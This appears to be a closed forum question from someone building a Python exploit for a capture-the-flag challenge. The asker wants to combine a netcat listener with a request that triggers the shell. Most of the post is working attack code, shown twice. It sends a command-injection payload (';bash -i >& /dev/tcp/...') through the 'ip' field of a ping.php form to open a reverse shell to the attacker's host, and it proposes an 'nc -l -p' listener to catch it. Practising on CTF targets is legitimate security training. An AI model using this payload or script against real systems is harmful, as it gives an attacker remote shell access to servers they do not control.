18Eyl
Create netcat listener and execute reverse shell in the same script [closed]
I'm coding an exploit in python that exploits a command injection vulnerability for a CTF and I'm wondering how could I start a netcat listener and then send the payload to the remote host and once the connection is stablished the script execution finishes and drops me to the stablished connection.
This is my code:
url= "http://vuln_url:8080/ping.php"
IP_ADDRESS = 'local_ip'
PORT = '9999'
cmd = ';bash -i >& /dev/tcp/%s/%s 0>&1' % (IP_ADDRESS, PORT)
values = {
'ip': cmd,
'submit':'submit'
}
data = urllib.urlencode(values)
req = urllib2.Request(url, data)
urllib2.urlopen(req)
What I want to do is something like this:
url= "http://vuln_url:8080/ping.php"
IP_ADDRESS = 'local_ip'
PORT = '9999'
cmd = ';bash -i >& /dev/tcp/%s/%s 0>&1' % (IP_ADDRESS, PORT)
values = {
'ip': cmd,
'submit':'submit'
}
#Some code to start the nc listener ¿(os.system("nc -l -p 9999 -vvv")?
data = urllib.urlencode(values)
req = urllib2.Request(url, data)
#Execute the request and start the reverse shell
urllib2.urlopen(req)
#Code to drop me to the nc stablished connection
I'm not sure if such a thing is even possible. Any idea?
